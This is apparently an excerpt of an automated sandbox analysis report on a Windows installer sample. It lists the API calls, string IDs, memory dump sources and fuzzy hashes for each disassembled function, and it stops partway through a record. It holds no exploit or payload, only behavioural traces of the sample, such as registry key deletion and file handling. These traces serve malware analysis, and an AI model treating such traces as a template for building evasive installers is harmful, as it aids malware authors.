                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                              • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
                                              • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                              • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(open cmd,00000400), ref: 004066BA
                                              • GetWindowsDirectoryW.KERNEL32(open cmd,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
                                              • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
                                              • SHGetPathFromIDListW.SHELL32(00000000,open cmd), ref: 00406717
                                              • CoTaskMemFree.OLE32(00000000), ref: 00406722
                                              • lstrcatW.KERNEL32(open cmd,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
                                              • lstrlenW.KERNEL32(open cmd,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open cmd
                                              • API String ID: 717251189-4218211737
                                              • Opcode ID: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
                                              • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
                                              • Opcode Fuzzy Hash: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
                                              • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D
                                              APIs
                                              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                              • lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                              • lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                              • SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID: ('B
                                              • API String ID: 2531174081-2332581011
                                              • Opcode ID: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
                                              • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
                                              • Opcode Fuzzy Hash: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
                                              • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404516
                                              • GetSysColor.USER32(00000000), ref: 00404554
                                              • SetTextColor.GDI32(?,00000000), ref: 00404560
                                              • SetBkMode.GDI32(?,?), ref: 0040456C
                                              • GetSysColor.USER32(?), ref: 0040457F
                                              • SetBkColor.GDI32(?,?), ref: 0040458F
                                              • DeleteObject.GDI32(?), ref: 004045A9
                                              • CreateBrushIndirect.GDI32(?), ref: 004045B3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                              • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
                                              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                              • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
                                              APIs
                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                              • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
                                              • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                              • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                              • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                              • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-4010320282
                                              • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                              • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
                                              • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                              • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
                                              APIs
                                              • DestroyWindow.USER32(?,00000000), ref: 00402FE1
                                              • GetTickCount.KERNEL32 ref: 00402FFF
                                              • wsprintfW.USER32 ref: 0040302D
                                                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00403051
                                              • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                                                • Part of subcall function 00402FAA: MulDiv.KERNEL32(?,00000064,?), ref: 00402FBF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 722711167-2449383134
                                              • Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
                                              • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
                                              • Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
                                              • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
                                              • GetMessagePos.USER32 ref: 00404E70
                                              • ScreenToClient.USER32(?,?), ref: 00404E8A
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                              • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                              • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                              • wsprintfW.USER32 ref: 00402F7D
                                              • SetWindowTextW.USER32(?,?), ref: 00402F8D
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402F9F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                              • API String ID: 1451636040-1158693248
                                              • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                              • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
                                              • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                              • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                              • GlobalFree.KERNEL32(?), ref: 004029F0
                                              • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                              • String ID:
                                              • API String ID: 2667972263-0
                                              • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                              • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
                                              • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                              • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
                                              APIs
                                              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                              • wsprintfW.USER32 ref: 00404DE9
                                              • SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s$H7B
                                              • API String ID: 3540041739-107966168
                                              • Opcode ID: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
                                              • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
                                              • Opcode Fuzzy Hash: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
                                              • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
                                              APIs
                                              • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                              • GetLastError.KERNEL32 ref: 00405ACA
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
                                              • GetLastError.KERNEL32 ref: 00405AE9
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 3449924974-3081826266
                                              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                              • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
                                              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                              • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
                                              APIs
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CloseEnum$DeleteValue
                                              • String ID:
                                              • API String ID: 1354259210-0
                                              • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                              • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
